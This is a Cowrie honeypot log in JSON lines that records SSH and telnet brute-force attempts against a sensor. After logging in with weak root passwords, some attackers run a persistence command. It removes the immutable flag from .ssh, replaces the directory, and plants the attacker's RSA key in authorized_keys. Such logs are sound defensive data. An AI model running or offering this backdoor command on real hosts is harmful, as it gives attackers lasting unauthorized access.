{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45405,"dst_ip":"1.2.3.4","dst_port":23,"session":"71d3735b9b46","protocol":"telnet","message":"New connection: 212.227.125.160:45405 (1.2.3.4:23) [session: 71d3735b9b46]","sensor":"my-vps","timestamp":"2025-09-09T04:13:51.217318Z"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"1","message":"login attempt [nexus/1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:13:52.044059Z","src_ip":"154.209.4.55","session":"c45b33a5327e"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":60422,"dst_ip":"1.2.3.4","dst_port":22,"session":"859c99cf67d5","protocol":"ssh","message":"New connection: 192.210.135.20:60422 (1.2.3.4:22) [session: 859c99cf67d5]","sensor":"my-vps","timestamp":"2025-09-09T04:13:52.513504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:13:52.514247Z","src_ip":"192.210.135.20","session":"859c99cf67d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:13:52.623332Z","src_ip":"192.210.135.20","session":"859c99cf67d5"}
{"eventid":"cowrie.login.failed","username":"x","password":"x","message":"login attempt [x/x] failed","sensor":"my-vps","timestamp":"2025-09-09T04:13:53.062730Z","src_ip":"192.210.135.20","session":"859c99cf67d5"}
{"eventid":"cowrie.session.closed","duration":13.886484146118164,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:53.218853Z","src_ip":"212.227.125.160","session":"1c8b7cd6b040"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:53.254537Z","src_ip":"154.209.4.55","session":"c45b33a5327e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45534,"dst_ip":"1.2.3.4","dst_port":23,"session":"9b4af77cd163","protocol":"telnet","message":"New connection: 212.227.125.160:45534 (1.2.3.4:23) [session: 9b4af77cd163]","sensor":"my-vps","timestamp":"2025-09-09T04:13:53.426440Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:54.174171Z","src_ip":"192.210.135.20","session":"859c99cf67d5"}
{"eventid":"cowrie.session.closed","duration":13.892154455184937,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:04.373635Z","src_ip":"212.227.125.160","session":"6370f48ec09b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45733,"dst_ip":"1.2.3.4","dst_port":23,"session":"0870c99a6051","protocol":"telnet","message":"New connection: 212.227.125.160:45733 (1.2.3.4:23) [session: 0870c99a6051]","sensor":"my-vps","timestamp":"2025-09-09T04:14:04.572786Z"}
{"eventid":"cowrie.session.closed","duration":13.96194839477539,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:05.179203Z","src_ip":"212.227.125.160","session":"71d3735b9b46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45737,"dst_ip":"1.2.3.4","dst_port":23,"session":"a575aea57414","protocol":"telnet","message":"New connection: 212.227.125.160:45737 (1.2.3.4:23) [session: a575aea57414]","sensor":"my-vps","timestamp":"2025-09-09T04:14:05.358097Z"}
{"eventid":"cowrie.session.closed","duration":13.65250825881958,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:07.078881Z","src_ip":"212.227.125.160","session":"9b4af77cd163"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45750,"dst_ip":"1.2.3.4","dst_port":23,"session":"fbef4e526dee","protocol":"telnet","message":"New connection: 212.227.125.160:45750 (1.2.3.4:23) [session: fbef4e526dee]","sensor":"my-vps","timestamp":"2025-09-09T04:14:07.257270Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45751,"dst_ip":"1.2.3.4","dst_port":23,"session":"19283784fba8","protocol":"telnet","message":"New connection: 212.227.125.160:45751 (1.2.3.4:23) [session: 19283784fba8]","sensor":"my-vps","timestamp":"2025-09-09T04:14:07.341793Z"}
{"eventid":"cowrie.session.closed","duration":13.916892528533936,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:18.489601Z","src_ip":"212.227.125.160","session":"0870c99a6051"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45938,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a95478ef9e6","protocol":"telnet","message":"New connection: 212.227.125.160:45938 (1.2.3.4:23) [session: 2a95478ef9e6]","sensor":"my-vps","timestamp":"2025-09-09T04:14:18.699555Z"}
{"eventid":"cowrie.session.closed","duration":13.96070671081543,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:19.318713Z","src_ip":"212.227.125.160","session":"a575aea57414"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45943,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef5292069b62","protocol":"telnet","message":"New connection: 212.227.125.160:45943 (1.2.3.4:23) [session: ef5292069b62]","sensor":"my-vps","timestamp":"2025-09-09T04:14:19.520000Z"}
{"eventid":"cowrie.session.closed","duration":13.603052377700806,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:20.860244Z","src_ip":"212.227.125.160","session":"fbef4e526dee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45955,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c42420f1a42","protocol":"telnet","message":"New connection: 212.227.125.160:45955 (1.2.3.4:23) [session: 2c42420f1a42]","sensor":"my-vps","timestamp":"2025-09-09T04:14:21.057583Z"}
{"eventid":"cowrie.session.closed","duration":13.831265926361084,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:21.172964Z","src_ip":"212.227.125.160","session":"19283784fba8"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":55046,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8ed88108c8f","protocol":"ssh","message":"New connection: 103.59.95.12:55046 (1.2.3.4:22) [session: c8ed88108c8f]","sensor":"my-vps","timestamp":"2025-09-09T04:14:21.347687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:21.348496Z","src_ip":"103.59.95.12","session":"c8ed88108c8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45957,"dst_ip":"1.2.3.4","dst_port":23,"session":"2bb021b5b975","protocol":"telnet","message":"New connection: 212.227.125.160:45957 (1.2.3.4:23) [session: 2bb021b5b975]","sensor":"my-vps","timestamp":"2025-09-09T04:14:21.383936Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:21.613533Z","src_ip":"103.59.95.12","session":"c8ed88108c8f"}
{"eventid":"cowrie.login.failed","username":"frappe-user","password":"123456","message":"login attempt [frappe-user/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T04:14:22.721336Z","src_ip":"103.59.95.12","session":"c8ed88108c8f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:23.988530Z","src_ip":"103.59.95.12","session":"c8ed88108c8f"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":34008,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa88c2aa8d86","protocol":"ssh","message":"New connection: 152.32.190.168:34008 (1.2.3.4:22) [session: aa88c2aa8d86]","sensor":"my-vps","timestamp":"2025-09-09T04:14:27.471293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:27.472061Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:27.669843Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc.1234","message":"login attempt [root/Abc.1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:14:28.500812Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:14:28.916234Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:14:28.917020Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:14:28.918138Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:29.116876Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:14:29.618330Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:14:29.619083Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:14:29.818466Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:29.819355Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":53102,"dst_ip":"1.2.3.4","dst_port":22,"session":"f94bdbf51add","protocol":"ssh","message":"New connection: 152.32.190.168:53102 (1.2.3.4:22) [session: f94bdbf51add]","sensor":"my-vps","timestamp":"2025-09-09T04:14:30.023437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:30.024326Z","src_ip":"152.32.190.168","session":"f94bdbf51add"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:30.226621Z","src_ip":"152.32.190.168","session":"f94bdbf51add"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:14:31.074817Z","src_ip":"152.32.190.168","session":"f94bdbf51add"}
{"eventid":"cowrie.session.closed","duration":13.494493007659912,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.193973Z","src_ip":"212.227.125.160","session":"2a95478ef9e6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.279936Z","src_ip":"152.32.190.168","session":"f94bdbf51add"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":41148,"dst_ip":"1.2.3.4","dst_port":22,"session":"887668689a01","protocol":"ssh","message":"New connection: 51.81.118.153:41148 (1.2.3.4:22) [session: 887668689a01]","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.355073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.355709Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46146,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a7dae6c1e16","protocol":"telnet","message":"New connection: 212.227.125.160:46146 (1.2.3.4:23) [session: 7a7dae6c1e16]","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.388905Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.455014Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":53108,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f6995fbc53a","protocol":"ssh","message":"New connection: 152.32.190.168:53108 (1.2.3.4:22) [session: 0f6995fbc53a]","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.473009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.473644Z","src_ip":"152.32.190.168","session":"0f6995fbc53a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.670865Z","src_ip":"152.32.190.168","session":"0f6995fbc53a"}
{"eventid":"cowrie.login.success","username":"root","password":"asd123..","message":"login attempt [root/asd123..] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:14:32.882807Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.session.closed","duration":13.529607772827148,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.049539Z","src_ip":"212.227.125.160","session":"ef5292069b62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:14:33.101247Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.102092Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.103331Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.201281Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46150,"dst_ip":"1.2.3.4","dst_port":23,"session":"0e3f8d2518f9","protocol":"telnet","message":"New connection: 212.227.125.160:46150 (1.2.3.4:23) [session: 0e3f8d2518f9]","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.249962Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:14:33.495608Z","src_ip":"51.81.118.153","session":"887668689a01"}
